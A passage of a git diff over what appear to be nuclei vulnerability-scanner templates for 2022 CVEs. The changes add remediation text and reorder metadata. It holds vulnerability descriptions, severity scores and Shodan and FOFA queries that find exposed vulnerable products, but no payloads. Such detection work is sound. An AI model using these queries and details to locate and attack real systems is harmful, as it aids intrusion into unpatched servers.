cpe:2.3:a:syntactics:free_booking_plugin_for_hotels\,_restaurant_and_car_rental:*:*:*:*:*:wordpress:*:* metadata: - max-request: 3 verified: true - framework: wordpress + max-request: 3 vendor: syntactics product: free_booking_plugin_for_hotels\,_restaurant_and_car_rental + framework: wordpress tags: cve,cve2022,wpscan,wordpress,easync-booking,unauth,wp,file-upload,wp-plugin,intrusive http: diff --git a/http/cves/2022/CVE-2022-2034.yaml b/http/cves/2022/CVE-2022-2034.yaml index 36693fe41d..6088abb6d1 100644 --- a/http/cves/2022/CVE-2022-2034.yaml +++ b/http/cves/2022/CVE-2022-2034.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Sensei LMS plugin before 4.5.0 is susceptible to information disclosure. The plugin does not have proper permissions set in a REST endpoint, which can allow an attacker to access private messages. + remediation: | + Upgrade WordPress Sensei LMS to version 4.5.0 or later to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/aba3dd58-7a8e-4129-add5-4dd5972c0426 - https://hackerone.com/reports/1590237 @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-2034 cwe-id: CWE-639 epss-score: 0.00569 - cpe: cpe:2.3:a:automattic:sensei_lms:*:*:*:*:*:wordpress:*:* epss-percentile: 0.75021 + cpe: cpe:2.3:a:automattic:sensei_lms:*:*:*:*:*:wordpress:*:* metadata: - max-request: 100 verified: true - framework: wordpress + max-request: 100 vendor: automattic product: sensei_lms + framework: wordpress tags: wp,disclosure,wpscan,cve,cve2022,sensei-lms,fuzz,hackerone,wordpress,wp-plugin http: diff --git a/http/cves/2022/CVE-2022-21371.yaml b/http/cves/2022/CVE-2022-21371.yaml index d23411f96e..cf97ee1853 100644 --- a/http/cves/2022/CVE-2022-21371.yaml +++ b/http/cves/2022/CVE-2022-21371.yaml @@ -5,6 +5,8 @@ info: author: paradessia,narluin severity: high description: An easily exploitable local file inclusion vulnerability allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Successful attacks of this vulnerability can result in unauthorized and sometimes complete access to critical data. + remediation: | + Apply the latest security patches provided by Oracle to fix the vulnerability. reference: - https://www.oracle.com/security-alerts/cpujan2022.html - https://nvd.nist.gov/vuln/detail/CVE-2022-21371 @@ -16,8 +18,8 @@ info: cve-id: CVE-2022-21371 cwe-id: CWE-22 epss-score: 0.96287 - cpe: cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:* epss-percentile: 0.99331 + cpe: cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:* metadata: max-request: 2 vendor: oracle diff --git a/http/cves/2022/CVE-2022-21500.yaml b/http/cves/2022/CVE-2022-21500.yaml index 0564058e8f..5de3aa4d3a 100644 --- a/http/cves/2022/CVE-2022-21500.yaml +++ b/http/cves/2022/CVE-2022-21500.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Oracle E-Business Suite (component: Manage Proxies) 12.1 and 12.2 are susceptible to an easily exploitable vulnerability that allows an unauthenticated attacker with network access via HTTP to compromise it by self-registering for an account. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle E-Business Suite accessible data. + remediation: | + Apply the necessary security patches or updates provided by Oracle to mitigate this vulnerability. reference: - https://orwaatyat.medium.com/my-new-discovery-in-oracle-e-business-login-panel-that-allowed-to-access-for-all-employees-ed0ec4cad7ac - https://twitter.com/GodfatherOrwa/status/1514720677173026816 @@ -17,14 +19,14 @@ info: cvss-score: 7.5 cve-id: CVE-2022-21500 epss-score: 0.95664 - cpe: cpe:2.3:a:oracle:e-business_suite:12.2:*:*:*:*:*:*:* epss-percentile: 0.99159 + cpe: cpe:2.3:a:oracle:e-business_suite:12.2:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.title:"Login" "X-ORACLE-DMS-ECID" 200 verified: true + max-request: 1 vendor: oracle product: e-business_suite + shodan-query: http.title:"Login" "X-ORACLE-DMS-ECID" 200 tags: cve,cve2022,oracle,misconfig,auth-bypass http: diff --git a/http/cves/2022/CVE-2022-21587.yaml b/http/cves/2022/CVE-2022-21587.yaml index 18d512a3da..1bd1455ec7 100644 --- a/http/cves/2022/CVE-2022-21587.yaml +++ b/http/cves/2022/CVE-2022-21587.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Oracle E-Business Suite 12.2.3 through 12.2.11 is susceptible to remote code execution via the Oracle Web Applications Desktop Integrator product, Upload component. An attacker with HTTP network access can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + remediation: | + Apply the necessary security patches provided by Oracle to mitigate this vulnerability. reference: - https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/ - https://www.oracle.com/security-alerts/cpuoct2022.html @@ -17,8 +19,8 @@ info: cve-id: CVE-2022-21587 cwe-id: CWE-306 epss-score: 0.97288 - cpe: cpe:2.3:a:oracle:e-business_suite:*:*:*:*:*:*:*:* epss-percentile: 0.99785 + cpe: cpe:2.3:a:oracle:e-business_suite:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: oracle diff --git a/http/cves/2022/CVE-2022-21661.yaml b/http/cves/2022/CVE-2022-21661.yaml index d5f030c58f..45a84021e3 100644 --- a/http/cves/2022/CVE-2022-21661.yaml +++ b/http/cves/2022/CVE-2022-21661.yaml @@ -6,24 +6,24 @@ info: severity: high description: | WordPress before 5.8.3 is susceptible to SQL injection through multiple plugins or themes due to improper sanitization in WP_Query, An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: This has been patched in 5.8.3. Older affected versions are also fixed via security release, that go back till 3.7.37. We strongly recommend that you keep auto-updates enabled. There are no known workarounds for this vulnerability. reference: - https://wpscan.com/vulnerability/7f768bcf-ed33-4b22-b432-d1e7f95c1317 - https://www.zerodayinitiative.com/blog/2022/1/18/cve-2021-21661-exposing-database-info-via-wordpress-sql-injection - http://packetstormsecurity.com/files/165540/WordPress-Core-5.8.2-SQL-Injection.html - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-6676-cqfm-gw84 - https://nvd.nist.gov/vuln/detail/cve-2022-21661 - remediation: This has been patched in 5.8.3. Older affected versions are also fixed via security release, that go back till 3.7.37. We strongly recommend that you keep auto-updates enabled. There are no known workarounds for this vulnerability. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-21661 cwe-id: CWE-89 epss-score: 0.93816 - cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:* epss-percentile: 0.98788 + cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: wordpress product: wordpress tags: wp,sqli,wpquery,wpscan,packetstorm,cve,cve2022,wordpress diff --git a/http/cves/2022/CVE-2022-21705.yaml b/http/cves/2022/CVE-2022-21705.yaml index be8bbeb77c..048c69ae56 100644 --- a/http/cves/2022/CVE-2022-21705.yaml +++ b/http/cves/2022/CVE-2022-21705.yaml @@ -6,21 +6,21 @@ info: severity: high description: | October CMS is susceptible to remote code execution. In affected versions, user input is not properly sanitized before rendering. An authenticated user with the permissions to create, modify, and delete website pages can bypass cms.safe_mode and cms.enableSafeMode in order to execute arbitrary code. This affects admin panels that rely on safe mode and restricted permissions. + remediation: | + The issue has been patched in Build 474 (1.0.474) and 1.1.10. Users unable to upgrade should apply https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe manually to installation. reference: - https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe - https://github.com/octobercms/october/security/advisories/GHSA-79jw-2f46-wv22 - https://cyllective.com/blog/post/octobercms-cve-2022-21705/ - https://nvd.nist.gov/vuln/detail/CVE-2022-21705 - remediation: | - The issue has been patched in Build 474 (1.0.474) and 1.1.10. Users unable to upgrade should apply https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe manually to installation. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2022-21705 cwe-id: CWE-74 epss-score: 0.00519 - cpe: cpe:2.3:a:octobercms:october:*:*:*:*:*:*:*:* epss-percentile: 0.73816 + cpe: cpe:2.3:a:octobercms:october:*:*:*:*:*:*:*:* metadata: max-request: 5 vendor: octobercms @@ -111,4 +111,4 @@ http: internal: true part: body -# Obtain current theme used for Markup editor of OctoberCMS +# Obtain current theme used for Markup editor of OctoberCMS \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2185.yaml b/http/cves/2022/CVE-2022-2185.yaml index 58d43810b8..db5670c3c9 100644 --- a/http/cves/2022/CVE-2022-2185.yaml +++ b/http/cves/2022/CVE-2022-2185.yaml @@ -5,6 +5,8 @@ info: author: GitLab Red Team severity: high description: GitLab CE/EE 14.0 prior to 14.10.5, 15.0 prior to 15.0.4, and 15.1 prior to 15.1.1 is susceptible to remote code execution. An authenticated user authorized to import projects can import a maliciously crafted project, thus possibly being able to execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + remediation: | + Apply the latest security patches provided by GitLab to mitigate this vulnerability. reference: - https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/cve-hash-harvester - https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-2185.json @@ -17,13 +19,13 @@ info: cve-id: CVE-2022-2185 cwe-id: CWE-78 epss-score: 0.46606 - cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* epss-percentile: 0.96958 + cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: max-request: 1 - shodan-query: http.title:"GitLab" vendor: gitlab product: gitlab + shodan-query: http.title:"GitLab" tags: cve,cve2022,gitlab http: diff --git a/http/cves/2022/CVE-2022-2187.yaml b/http/cves/2022/CVE-2022-2187.yaml index 147690bba8..4e916d3801 100644 --- a/http/cves/2022/CVE-2022-2187.yaml +++ b/http/cves/2022/CVE-2022-2187.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Contact Form 7 Captcha plugin before 0.1.2 contains a reflected cross-site scripting vulnerability. It does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute. + remediation: | + Update the WordPress Contact Form 7 Captcha plugin to version 0.1.2 or later to mitigate the XSS vulnerability. reference: - https://wpscan.com/vulnerability/4fd2f1ef-39c6-4425-8b4d-1a332dabac8d - https://wordpress.org/plugins/contact-form-7-simple-recaptcha @@ -16,13 +18,13 @@ info: cve-id: CVE-2022-2187 cwe-id: CWE-79 epss-score: 0.00119 - cpe: cpe:2.3:a:contact_form_7_captcha_project:contact_form_7_captcha:*:*:*:*:*:wordpress:*:* epss-percentile: 0.45304 + cpe: cpe:2.3:a:contact_form_7_captcha_project:contact_form_7_captcha:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: contact_form_7_captcha_project product: contact_form_7_captcha + framework: wordpress tags: wpscan,cve,cve2022,wordpress,xss,wp-plugin,wp http: diff --git a/http/cves/2022/CVE-2022-2219.yaml b/http/cves/2022/CVE-2022-2219.yaml index a90ed34b01..8e57244cbe 100644 --- a/http/cves/2022/CVE-2022-2219.yaml +++ b/http/cves/2022/CVE-2022-2219.yaml @@ -6,24 +6,24 @@ info: severity: high description: | The plugin does not sanitise and escape the QUERY_STRING before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting in browsers which do not encode characters + remediation: Fixed in version 2.7.27 reference: - https://wpscan.com/vulnerability/1240797c-7f45-4c36-83f0-501c544ce76a - https://nvd.nist.gov/vuln/detail/CVE-2022-2219 - remediation: Fixed in version 2.7.27 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cve-id: CVE-2022-2219 cwe-id: CWE-79 epss-score: 0.00179 - cpe: cpe:2.3:a:brizy:unyson:*:*:*:*:*:wordpress:*:* epss-percentile: 0.5437 + cpe: cpe:2.3:a:brizy:unyson:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: brizy product: unyson + framework: wordpress tags: authenticated,cve,cve2022,wordpress,wp,xss,unyson,wp-plugin,wpscan http: diff --git a/http/cves/2022/CVE-2022-22242.yaml b/http/cves/2022/CVE-2022-22242.yaml index 9da34e544c..17579eeb58 100644 --- a/http/cves/2022/CVE-2022-22242.yaml +++ b/http/cves/2022/CVE-2022-22242.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Juniper Web Device Manager (J-Web) in Junos OS contains a cross-site scripting vulnerability. This can allow an unauthenticated attacker to run malicious scripts reflected off J-Web to the victim's browser in the context of their session within J-Web, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue affects all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R2; 22.1 versions prior to 22.1R2. + remediation: | + Apply the latest security patches or updates provided by Juniper Networks to mitigate this vulnerability. reference: - https://octagon.net/blog/2022/10/28/juniper-sslvpn-junos-rce-and-multiple-vulnerabilities/ - https://supportportal.juniper.net/s/article/2022-10-Security-Bulletin-Junos-OS-Multiple-vulnerabilities-in-J-Web?language=en_US @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-22242 cwe-id: CWE-79 epss-score: 0.40304 - cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* epss-percentile: 0.96776 + cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: title:"Juniper Web Device Manager" verified: true + max-request: 1 vendor: juniper product: junos + shodan-query: title:"Juniper Web Device Manager" tags: cve,cve2022,xss,juniper,junos http: diff --git a/http/cves/2022/CVE-2022-22536.yaml b/http/cves/2022/CVE-2022-22536.yaml index 1d87af4af2..53a4145fb1 100644 --- a/http/cves/2022/CVE-2022-22536.yaml +++ b/http/cves/2022/CVE-2022-22536.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: critical description: SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable to request smuggling and request concatenation attacks. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system. + remediation: | + Apply the latest security patches and updates provided by SAP to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-22536 - https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+February+2022 @@ -17,13 +19,13 @@ info: cve-id: CVE-2022-22536 cwe-id: CWE-444 epss-score: 0.96538 - cpe: cpe:2.3:a:sap:content_server:7.53:*:*:*:*:*:*:* epss-percentile: 0.99422 + cpe: cpe:2.3:a:sap:content_server:7.53:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: http.favicon.hash:-266008933 vendor: sap product: content_server + shodan-query: http.favicon.hash:-266008933 tags: cve,cve2022,sap,smuggling,netweaver,web-dispatcher,memory-pipes,kev http: diff --git a/http/cves/2022/CVE-2022-22733.yaml b/http/cves/2022/CVE-2022-22733.yaml index 6273f5e0c1..a9015b5aaf 100644 --- a/http/cves/2022/CVE-2022-22733.yaml +++ b/http/cves/2022/CVE-2022-22733.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache ShardingSphere ElasticJob-UI allows an attacker who has guest account to do privilege escalation. This issue affects Apache ShardingSphere ElasticJob-UI Apache ShardingSphere ElasticJob-UI 3.x version 3.0.0 and prior versions. + remediation: | + Apply the latest security patches or updates provided by Apache ShardingSphere to mitigate the privilege escalation vulnerability. reference: - https://www.vicarius.io/vsociety/blog/cve-2022-22733-apache-shardingsphere-elasticjob-ui-privilege-escalation - https://nvd.nist.gov/vuln/detail/CVE-2022-22733 @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-22733 cwe-id: CWE-200 epss-score: 0.28675 - cpe: cpe:2.3:a:apache:shardingsphere_elasticjob-ui:3.0.0:-:*:*:*:*:*:* epss-percentile: 0.96259 + cpe: cpe:2.3:a:apache:shardingsphere_elasticjob-ui:3.0.0:-:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.favicon.hash:816588900 verified: true + max-request: 1 vendor: apache product: shardingsphere_elasticjob-ui + shodan-query: http.favicon.hash:816588900 tags: cve,cve2023,exposure,sharingsphere,apache http: diff --git a/http/cves/2022/CVE-2022-22897.yaml b/http/cves/2022/CVE-2022-22897.yaml index 50b93880dd..d2212c7c05 100644 --- a/http/cves/2022/CVE-2022-22897.yaml +++ b/http/cves/2022/CVE-2022-22897.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A SQL injection vulnerability in the product_all_one_img and image_product parameters of the ApolloTheme AP PageBuilder component through 2.4.4 for PrestaShop allows unauthenticated attackers to exfiltrate database data. + remediation: | + Upgrade PrestaShop Ap Pagebuilder to version 2.4.5 or later to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-22897 - https://packetstormsecurity.com/files/cve/CVE-2022-22897 @@ -16,15 +18,15 @@ info: cve-id: CVE-2022-22897 cwe-id: CWE-89 epss-score: 0.03722 - cpe: cpe:2.3:a:apollotheme:ap_pagebuilder:*:*:*:*:*:prestashop:*:* epss-percentile: 0.90593 + cpe: cpe:2.3:a:apollotheme:ap_pagebuilder:*:*:*:*:*:prestashop:*:* metadata: - max-request: 2 - shodan-query: http.component:"Prestashop" verified: true - framework: prestashop + max-request: 2 vendor: apollotheme product: ap_pagebuilder + framework: prestashop + shodan-query: http.component:"Prestashop" tags: packetstorm,cve,cve2022,prestashop,sqli,unauth http: diff --git a/http/cves/2022/CVE-2022-2290.yaml b/http/cves/2022/CVE-2022-2290.yaml index 79b9c0b6da..f29466e7d7 100644 --- a/http/cves/2022/CVE-2022-2290.yaml +++ b/http/cves/2022/CVE-2022-2290.yaml @@ -5,6 +5,8 @@ info: author: dbrwsky severity: medium description: Trilium prior to 0.52.4, 0.53.1-beta contains a cross-site scripting vulnerability which can allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. + remediation: | + Upgrade Trilium to version 0.52.4 or later, which includes proper input sanitization to mitigate the XSS vulnerability. reference: - https://huntr.dev/bounties/367c5c8d-ad6f-46be-8503-06648ecf09cf/ - https://github.com/zadam/trilium @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-2290 cwe-id: CWE-79 epss-score: 0.00112 - cpe: cpe:2.3:a:trilium_project:trilium:*:*:*:*:*:*:*:* epss-percentile: 0.43971 + cpe: cpe:2.3:a:trilium_project:trilium:*:*:*:*:*:*:*:* metadata: - max-request: 3 - shodan-query: title:"Trilium Notes" verified: true + max-request: 3 vendor: trilium_project product: trilium + shodan-query: title:"Trilium Notes" tags: cve,cve2022,xss,trilium,huntr http: diff --git a/http/cves/2022/CVE-2022-22947.yaml b/http/cves/2022/CVE-2022-22947.yaml index bbd49f3cd1..cbb5a88115 100644 --- a/http/cves/2022/CVE-2022-22947.yaml +++ b/http/cves/2022/CVE-2022-22947.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: critical description: Applications using Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host. + remediation: | + Apply the latest security patches provided by the vendor and ensure proper input validation to prevent code injection attacks. reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-22947 - https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/ @@ -17,8 +19,8 @@ info: cve-id: CVE-2022-22947 cwe-id: CWE-917,CWE-94 epss-score: 0.9754 - cpe: cpe:2.3:a:vmware:spring_cloud_gateway:*:*:*:*:*:*:*:* epss-percentile: 0.99989 + cpe: cpe:2.3:a:vmware:spring_cloud_gateway:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: vmware diff --git a/http/cves/2022/CVE-2022-22954.yaml b/http/cves/2022/CVE-2022-22954.yaml index 6d4ace7ffa..c4e8f54676 100644 --- a/http/cves/2022/CVE-2022-22954.yaml +++ b/http/cves/2022/CVE-2022-22954.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | VMware Workspace ONE Access is susceptible to a remote code execution vulnerability due to a server-side template injection flaw. An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager. + remediation: | + Apply the latest security patches provided by VMware to mitigate this vulnerability. reference: - https://www.tenable.com/blog/vmware-patches-multiple-vulnerabilities-in-workspace-one-vmsa-2022-0011 - https://www.vmware.com/security/advisories/VMSA-2022-0011.html @@ -17,13 +19,13 @@ info: cve-id: CVE-2022-22954 cwe-id: CWE-94 epss-score: 0.97532 - cpe: cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:* epss-percentile: 0.99985 + cpe: cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.favicon.hash:-1250474341 vendor: vmware product: identity_manager + shodan-query: http.favicon.hash:-1250474341 tags: workspaceone,kev,tenable,packetstorm,cve,cve2022,vmware,ssti http: diff --git a/http/cves/2022/CVE-2022-22963.yaml b/http/cves/2022/CVE-2022-22963.yaml index cb6746ec22..1d438a0a73 100644 --- a/http/cves/2022/CVE-2022-22963.yaml +++ b/http/cves/2022/CVE-2022-22963.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions are susceptible to remote code execution vulnerabilities. When using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources. + remediation: | + Apply the latest security patches provided by the Spring Cloud project to mitigate this vulnerability. reference: - https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f - https://github.com/cckuailong/spring-cloud-function-SpEL-RCE @@ -19,8 +21,8 @@ info: cve-id: CVE-2022-22963 cwe-id: CWE-917,CWE-94 epss-score: 0.97452 - cpe: cpe:2.3:a:vmware:spring_cloud_function:*:*:*:*:*:*:*:* epss-percentile: 0.99924 + cpe: cpe:2.3:a:vmware:spring_cloud_function:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: vmware diff --git a/http/cves/2022/CVE-2022-22965.yaml b/http/cves/2022/CVE-2022-22965.yaml index 771b343b2b..f3774b4f4c 100644 --- a/http/cves/2022/CVE-2022-22965.yaml +++ b/http/cves/2022/CVE-2022-22965.yaml @@ -6,6 +6,7 @@ info: severity: critical description: | Spring MVC and Spring WebFlux applications running on Java Development Kit 9+ are susceptible to remote code execution via data binding. It requires the application to run on Tomcat as a WAR deployment. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + remediation: If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to this exploit. reference: - https://tanzu.vmware.com/security/cve-2022-22965 - https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/ @@ -13,15 +14,14 @@ info: - https://mp.weixin.qq.com/s/kgw-O4Hsd9r2vfme3Y2Ynw - https://twitter.com/_0xf4n9x_/status/1509935429365100546 - https://nvd.nist.gov/vuln/detail/cve-2022-22965 - remediation: If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to this exploit. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-22965 cwe-id: CWE-94 epss-score: 0.97502 - cpe: cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:* epss-percentile: 0.99964 + cpe: cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:* metadata: max-request: 4 vendor: vmware diff --git a/http/cves/2022/CVE-2022-22972.yaml b/http/cves/2022/CVE-2022-22972.yaml index 1641cdb382..cfa3852e40 100644 --- a/http/cves/2022/CVE-2022-22972.yaml +++ b/http/cves/2022/CVE-2022-22972.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate. + remediation: | + Apply the latest security patches or updates provided by VMware to fix the authentication bypass vulnerability (CVE-2022-22972). reference: - https://github.com/horizon3ai/CVE-2022-22972 - https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive @@ -17,13 +19,13 @@ info: cve-id: CVE-2022-22972 cwe-id: CWE-287 epss-score: 0.78281 - cpe: cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:* epss-percentile: 0.97824 + cpe: cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:* metadata: max-request: 3 - fofa-query: app="vmware-Workspace-ONE-Access" || app="vmware-Identity-Manager" || app="vmware-vRealize" vendor: vmware product: identity_manager + fofa-query: app="vmware-Workspace-ONE-Access" || app="vmware-Identity-Manager" || app="vmware-vRealize" tags: cve,cve2022,vmware,auth-bypass,oast http: diff --git a/http/cves/2022/CVE-2022-23102.yaml b/http/cves/2022/CVE-2022-23102.yaml index 67d282f1ea..4692313914 100644 --- a/http/cves/2022/CVE-2022-23102.yaml +++ b/http/cves/2022/CVE-2022-23102.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A vulnerability has been identified in SINEMA Remote Connect Server (All versions < V2.0). Affected products contain an open redirect vulnerability. An attacker could trick a valid authenticated user to the device into clicking a malicious link there by leading to phishing attacks. + remediation: | + Upgrade to SINEMA Remote Connect Server version 2.0 or later to fix the open redirect vulnerability. reference: - https://nvd.nist.gov/vuln/detail/cve-2022-23102 - https://packetstormsecurity.com/files/165966/SIEMENS-SINEMA-Remote-Connect-1.0-SP3-HF1-Open-Redirection.html @@ -17,13 +19,13 @@ info: cve-id: CVE-2022-23102 cwe-id: CWE-601 epss-score: 0.00434 - cpe: cpe:2.3:a:siemens:sinema_remote_connect_server:*:*:*:*:*:*:*:* epss-percentile: 0.71407 + cpe: cpe:2.3:a:siemens:sinema_remote_connect_server:*:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: title:"Logon - SINEMA Remote Connect" vendor: siemens product: sinema_remote_connect_server + shodan-query: title:"Logon - SINEMA Remote Connect" tags: packetstorm,seclists,cve,cve2022,redirect,sinema,authenticated http: diff --git a/http/cves/2022/CVE-2022-23131.yaml b/http/cves/2022/CVE-2022-23131.yaml index a4875a5603..eaf7c2822e 100644 --- a/http/cves/2022/CVE-2022-23131.yaml +++ b/http/cves/2022/CVE-2022-23131.yaml @@ -5,26 +5,26 @@ info: author: For3stCo1d,spac3wh1te severity: critical description: When SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor because a user login stored in the session was not verified. + remediation: Upgrade to 5.4.9rc2, 6.0.0beta1, 6.0 (plan) or higher. reference: - https://support.zabbix.com/browse/ZBX-20350 - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage - https://nvd.nist.gov/vuln/detail/CVE-2022-23131 - https://github.com/1mxml/CVE-2022-23131 - remediation: Upgrade to 5.4.9rc2, 6.0.0beta1, 6.0 (plan) or higher. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-23131 cwe-id: CWE-290 epss-score: 0.97044 - cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* epss-percentile: 0.99643 + cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* metadata: max-request: 2 - fofa-query: app="ZABBIX-监控系统" && body="saml" - shodan-query: http.favicon.hash:892542951 vendor: zabbix product: zabbix + shodan-query: http.favicon.hash:892542951 + fofa-query: app="ZABBIX-监控系统" && body="saml" tags: cve,cve2022,zabbix,auth-bypass,saml,sso,kev http: diff --git a/http/cves/2022/CVE-2022-23134.yaml b/http/cves/2022/CVE-2022-23134.yaml index 2593b0e73e..402f8807cb 100644 --- a/http/cves/2022/CVE-2022-23134.yaml +++ b/http/cves/2022/CVE-2022-23134.yaml @@ -5,6 +5,8 @@ info: author: bananabr severity: medium description: After the initial setup process, some steps of setup.php file are reachable not only by super-administrators but also by unauthenticated users. A malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend. + remediation: | + Apply the latest security patches or updates provided by Zabbix to fix the authentication bypass vulnerability. reference: - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage - https://nvd.nist.gov/vuln/detail/CVE-2022-23134 @@ -17,8 +19,8 @@ info: cve-id: CVE-2022-23134 cwe-id: CWE-287,CWE-284 epss-score: 0.48649 - cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* epss-percentile: 0.97026 + cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: zabbix diff --git a/http/cves/2022/CVE-2022-2314.yaml 